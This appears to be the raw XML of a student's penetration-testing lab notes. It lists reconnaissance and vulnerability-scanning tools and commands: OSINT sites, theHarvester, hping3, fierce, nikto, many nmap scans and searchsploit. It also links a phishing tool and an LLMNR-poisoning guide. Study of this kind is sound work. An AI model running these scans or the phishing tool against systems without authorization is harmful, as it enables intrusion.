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7889CA" w:rsidP="6EB151C4" w:rsidRDefault="447889CA" w14:paraId="5052F3BC" w14:textId="0BCDAB98">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="447889CA">
        <w:rPr/>
        <w:t>Hping3 (like nmap)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="447889CA" w:rsidP="6EB151C4" w:rsidRDefault="447889CA" w14:paraId="33A32728" w14:textId="6CA7DB57">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2D518BF2">
        <w:rPr/>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="447889CA">
        <w:rPr/>
        <w:t>ping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA30CD" w:rsidP="33D4F88D" w:rsidRDefault="00CA30CD" w14:paraId="226C6269" w14:textId="21788AE0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="00CA30CD">
        <w:rPr/>
        <w:t>OSINT Framework</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA30CD" w:rsidP="33D4F88D" w:rsidRDefault="00CA30CD" w14:paraId="3EFA9FFF" w14:textId="133693D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hyperlink r:id="Rcd4971e988aa4e3a">
        <w:r w:rsidRPr="33D4F88D" w:rsidR="00CA30CD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https://osintframework.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="39AD9AE2" w:rsidP="33D4F88D" w:rsidRDefault="39AD9AE2" w14:paraId="200A85E8" w14:textId="3CCA17D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3D4F88D" w:rsidR="39AD9A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Domain Dossier</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="56B8D227" w:rsidP="33D4F88D" w:rsidRDefault="56B8D227" w14:paraId="67454B5D" w14:textId="13A5D53F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33D4F88D" w:rsidR="56B8D2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Robtex</w:t>
      </w:r>
      <w:r w:rsidRPr="33D4F88D" w:rsidR="56B8D2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(R)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="56B8D227" w:rsidP="33D4F88D" w:rsidRDefault="56B8D227" w14:paraId="08C74CA8" w14:textId="6071BAE5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33D4F88D" w:rsidR="56B8D227">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">These are for discovering info about the domain/IP addresses </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1D37930E" w:rsidP="33D4F88D" w:rsidRDefault="1D37930E" w14:paraId="0BA94887" w14:textId="30E383F4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="33D4F88D" w:rsidR="1D37930E">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Maltego</w:t>
      </w:r>
      <w:r w:rsidRPr="33D4F88D" w:rsidR="1102F273">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Parrot Security)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1102F273" w:rsidP="33D4F88D" w:rsidRDefault="1102F273" w14:paraId="32C33573" w14:textId="5AFFA70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3D4F88D" w:rsidR="1102F2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Applications</w:t>
      </w:r>
      <w:r w:rsidRPr="33D4F88D" w:rsidR="1102F2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</w:t>
      </w:r>
      <w:r w:rsidRPr="33D4F88D" w:rsidR="1102F2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Pentesting</w:t>
      </w:r>
      <w:r w:rsidRPr="33D4F88D" w:rsidR="1102F2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</w:t>
      </w:r>
      <w:r w:rsidRPr="33D4F88D" w:rsidR="1102F2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Information Gathering</w:t>
      </w:r>
      <w:r w:rsidRPr="33D4F88D" w:rsidR="1102F2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</w:t>
      </w:r>
      <w:r w:rsidRPr="33D4F88D" w:rsidR="1102F2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OSINT Analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="33D4F88D" w:rsidR="1102F27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-&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="33D4F88D" w:rsidR="1102F2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maltego</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="33D4F88D" w:rsidP="33D4F88D" w:rsidRDefault="33D4F88D" w14:paraId="05F09082" w14:textId="0B5B0B9B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="49B2E04C" w:rsidP="33D4F88D" w:rsidRDefault="49B2E04C" w14:paraId="310F0EF0" w14:textId="7C8E0212">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R7192df80ba19402e">
        <w:r w:rsidRPr="0C5E9F89" w:rsidR="49B2E04C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof w:val="0"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://github.com/htr-tech/zphisher</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0C5E9F89" w:rsidR="49B2E04C">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Phishing tool</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7DC0CBE7" w:rsidP="0C5E9F89" w:rsidRDefault="7DC0CBE7" w14:paraId="0216746B" w14:textId="667E6F57">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R26c97d675b934175">
        <w:r w:rsidRPr="0C5E9F89" w:rsidR="7DC0CBE7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof w:val="0"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.hackingarticles.in/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0C5E9F89" w:rsidR="7DC0CBE7">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7DC0CBE7" w:rsidP="0C5E9F89" w:rsidRDefault="7DC0CBE7" w14:paraId="782FAC8E" w14:textId="453A44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f5e1ff7f09040c5">
        <w:r w:rsidRPr="0C5E9F89" w:rsidR="7DC0CBE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https://portswigger.net/web-security/file-path-traversal</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="7DC0CBE7" w:rsidP="0C5E9F89" w:rsidRDefault="7DC0CBE7" w14:paraId="7FC0B527" w14:textId="099E2A43">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:hyperlink w:anchor=":~:text=Responder%20(LLMNR%20poisoner)%20creates%20a,we%20use%20the%20%2Dw%20option" r:id="R5a0578499db4443e">
        <w:r w:rsidRPr="0C5E9F89" w:rsidR="7DC0CBE7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https://www.hackingarticles.in/a-detailed-guide-on-responder-llmnr-poisoning/#:~:text=Responder%20(LLMNR%20poisoner)%20creates%20a,we%20use%20the%20%2Dw%20option</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0C5E9F89" w:rsidR="7DC0CBE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5E9F89" w:rsidP="0C5E9F89" w:rsidRDefault="0C5E9F89" w14:paraId="2EFCE957" w14:textId="12868AA0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0C5E9F89" w:rsidP="0C5E9F89" w:rsidRDefault="0C5E9F89" w14:paraId="404A9B31" w14:textId="4D7E72ED">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0C5E9F89" w:rsidP="0C5E9F89" w:rsidRDefault="0C5E9F89" w14:paraId="56E24706" w14:textId="48204FB2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0C5E9F89" w:rsidP="0C5E9F89" w:rsidRDefault="0C5E9F89" w14:paraId="2CD4783F" w14:textId="4FE0A33D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0C5E9F89" w:rsidP="0C5E9F89" w:rsidRDefault="0C5E9F89" w14:paraId="37FB70AD" w14:textId="1B770CFF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0C5E9F89" w:rsidP="0C5E9F89" w:rsidRDefault="0C5E9F89" w14:paraId="7403DF43" w14:textId="33E0D287">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0C5E9F89" w:rsidP="0C5E9F89" w:rsidRDefault="0C5E9F89" w14:paraId="34F218AB" w14:textId="7835AD64">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0C5E9F89" w:rsidP="0C5E9F89" w:rsidRDefault="0C5E9F89" w14:paraId="21DE1564" w14:textId="356ED8B2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0C5E9F89" w:rsidP="0C5E9F89" w:rsidRDefault="0C5E9F89" w14:paraId="046E5838" w14:textId="6E9F2409">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0C5E9F89" w:rsidP="0C5E9F89" w:rsidRDefault="0C5E9F89" w14:paraId="164B9780" w14:textId="009B8B50">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0C5E9F89" w:rsidP="0C5E9F89" w:rsidRDefault="0C5E9F89" w14:paraId="0ED7F63E" w14:textId="6BC88710">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0C5E9F89" w:rsidP="0C5E9F89" w:rsidRDefault="0C5E9F89" w14:paraId="1214CD0D" w14:textId="43145B7D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0C5E9F89" w:rsidP="0C5E9F89" w:rsidRDefault="0C5E9F89" w14:paraId="69B99E96" w14:textId="1F2D456C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0C5E9F89" w:rsidP="0C5E9F89" w:rsidRDefault="0C5E9F89" w14:paraId="78231DFF" w14:textId="3C21E10C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0C5E9F89" w:rsidP="0C5E9F89" w:rsidRDefault="0C5E9F89" w14:paraId="2841CB45" w14:textId="522CFADF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0C5E9F89" w:rsidP="0C5E9F89" w:rsidRDefault="0C5E9F89" w14:paraId="1E0564B3" w14:textId="740B0305">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0C5E9F89" w:rsidP="0C5E9F89" w:rsidRDefault="0C5E9F89" w14:paraId="247EF961" w14:textId="0B2DBE14">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0C5E9F89" w:rsidP="0C5E9F89" w:rsidRDefault="0C5E9F89" w14:paraId="2B14BC9C" w14:textId="28A49D16">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0C5E9F89" w:rsidP="0C5E9F89" w:rsidRDefault="0C5E9F89" w14:paraId="66E4A9B3" w14:textId="51FAF304">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="57860D14" w14:textId="12064D9C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1 – Passive Recon Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="79A72838" w14:textId="48B7039C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Domain Registry Search</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="3DE7929E" w14:textId="7B9F685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Website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“lookup.icann.org” – </w:t>
      </w:r>
      <w:r w:rsidRPr="0C5E9F89" w:rsidR="11A4D8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runs whois lookup on domain (must enter URL for info)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="7550FFE6" w14:textId="111BC6B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Purpose – Domain info, RDAP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="65962ECB" w14:textId="673BCE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Website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“nslookup.io” – DNS records</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="357CD53B" w14:textId="49201D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“sslscan  _______” for online SSL Check</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="3570193C" w14:textId="1017BA5B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TheHarvester</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="0B6B84AC" w14:textId="0D676D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“cat /etc/theHarvester/api-keys.yaml” to gather API keys and store them in the “api-keys.yaml” file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="3A1AD80A" w14:textId="61FABD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ADD MORE THEHARVESTER STUFF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="6D184D76" w14:textId="6B7E6F77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w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="2C39A3A9" w14:textId="3C6D17AE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2 – Active Recon Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="3D9A5FF0" w14:textId="67607B9D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FOCA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="52028EF2" w14:textId="7F37EE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ADD SOME STUFF ABOUT FOCA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="5906A1F0" w14:textId="07B77566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Identify and Confirm a Load Balancer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="31BCB1B7" w14:textId="49DAC8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“lbd” followed by the IP address of the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="4F504D1C" w14:textId="5A948370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Hping3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="5A908189" w14:textId="4242DB2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Can craft ICMP, UDP, TCP, SYN packets, possible DOS?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="7ECC962B" w14:textId="3483AB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hping3 -S _____ -p 80 -c 15” with the IP address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="757D9CB3" w14:textId="57DB3FB1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1CD49CA2" w14:textId="5154C7A5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Fierce</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="0A31E282" w14:textId="01F2E6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”fierce - - domain _____” with the website name.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="7F903979" w14:textId="0C82A56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Attempts to map the network, prepares for nmap. DNS Zone Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="22ED3D6A" w14:textId="5E31B716">
      <w:pPr>
        <w:spacing w:after="160" w:afterAutospacing="off" w:line="257" w:lineRule="auto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Documenting NMAP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="10B66AB0" w14:textId="7CC494D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use “mkdir _____” to create a directory. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="51D58C5D" w14:textId="4296BFB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to send the NMAP scans to this directory, type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="6D7E66D3" w14:textId="543EB3F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“sudo nmap -A -oN </w:t>
      </w:r>
      <w:r w:rsidRPr="0C5E9F89" w:rsidR="11A4D87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directoryName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/nmap_results _________” with all the IP addresses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="618A3540" w14:textId="1E39B15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(-A): Aggressive detection </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="1ED15652" w14:textId="3A59FB4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(-oN): outputs the results in a normal format</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="330A20F2" w14:textId="1C071DDE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Nikto</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="6D9DCCDF" w14:textId="407CBC0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Web server / web application scanner. Not stealthy. Aggressive scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="0E28A113" w14:textId="6EB63EC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use “nikto -host ________” with the IP address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="03FFF0BC" w14:textId="5AE467F3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5E9F89" w:rsidP="0C5E9F89" w:rsidRDefault="0C5E9F89" w14:paraId="28333BBF" w14:textId="1DB48996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40D327BF" w14:textId="0CC7B21C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7956773" w14:textId="7D13FED0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A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="688B9D8F" w14:textId="2E108D3F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3 – Analysis of Reconnaissance Results</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="63EC04CD" w14:textId="4E2467B4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Curl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="5DB69BD1" w14:textId="661AD56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“curl -I _______” with the IP addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="74F9D5C5" w14:textId="7924B7F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w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="3FB433BA" w14:textId="33E6F5A4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Nmap Scripting Engine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="1C5A066D" w14:textId="445454B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“ls -al /usr/share/nmap/scripts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="03E2A3D6" w14:textId="4F2EA4F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lists all the scripts that are available for use with the Nmap Scripting Engine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="6B6923FE" w14:textId="09B0096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Kali Linux: In command prompt, type “nmap - - script banner _____” with all the IP addresses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="0D8FE412" w14:textId="6F81232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attempts to connect to the ports and conduct banner grabbing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="00A99D05" w14:textId="3D68F79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Kali Linux: In command prompt, type “sudo nmap -sS -A -sC -oX PLAB --stylesheet </w:t>
      </w:r>
      <w:hyperlink r:id="Rf8674882e6b64b20">
        <w:r w:rsidRPr="0C5E9F89" w:rsidR="11A4D87F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https://raw.githubusercontent.com/honze-net/nmap-bootstrap-xsl/master/nmap-bootstrap.xsl ____________</w:t>
        </w:r>
      </w:hyperlink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” – documents results in XML which can be seen in browser</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="67EC7D01" w14:textId="09AD4F9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Just type in cmd “firefox PLAB” or whatever directory you were using. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="49D16DB3" w14:textId="05E76C97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4 – Vulnerability Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="44D54424" w14:textId="3264EEE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 SYN/Stealth Scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="78EB9236" w14:textId="38B7209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nmap -sS -Pn ______” with the IP address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="123152B5" w14:textId="1B2578F6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-Pn switch omits the ‘alive check’ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="4E886C2E" w14:textId="1E26B77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 TCP Connect Scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="3F30ADBD" w14:textId="67269C4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“nmap -sT -Pn _______” with the IP address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="667158B5" w14:textId="17F9CCD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 UDP Scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="2F079AAD" w14:textId="249CC55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nmap -sU –top-ports 200 ___” with the IP address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="575598CA" w14:textId="39AD09DE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UDP scan on only the top 200 UDP ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="43F24847" w14:textId="632DB98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OS fingerprinting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="2AE23B37" w14:textId="1B8A65E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nmap -O ____” with the IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="387C67B7" w14:textId="6394DE7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 Version Scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="6814F395" w14:textId="39F05FB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“nmap -sV -Pn _____” with the IP address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="375883AB" w14:textId="317A3E1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“searchsploit apache 2.4.37” to search in exploit-db.com for exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="40BC98C4" w14:textId="45AAB43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 Script Scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="39183883" w14:textId="2D413C4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“nmap -sC -Pn _____” with the IP address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="381C633C" w14:textId="360EADC9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Initiates a default NSE script scan.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="23A7BC57" w14:textId="62BA927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“nmap -Pn -sV -script=vuln ____” with the IP address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="32E3A4D1" w14:textId="67E98B2E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Takes the -sV version scan and performs a lookup on vulners.com.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="460FB6DE" w14:textId="057ACED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Perform an -A Scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="6D7CC2F0" w14:textId="69324C0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“nmap -Pn -A ____” with the IP address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="212D98EB" w14:textId="32C1CC49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Loud scan but returns versions of services, OS, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="2B92FF3B" w14:textId="5D2BF0E9">
      <w:pPr>
        <w:spacing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27005BE6" w14:textId="57C7658E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00E48655" w14:textId="37D7EC34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5 – Vulnerability Scanning (OpenVAS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="3073DED9" w14:textId="4AA26952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Update the OpenVAS Feed</w:t>
      </w:r>
    </w:p>
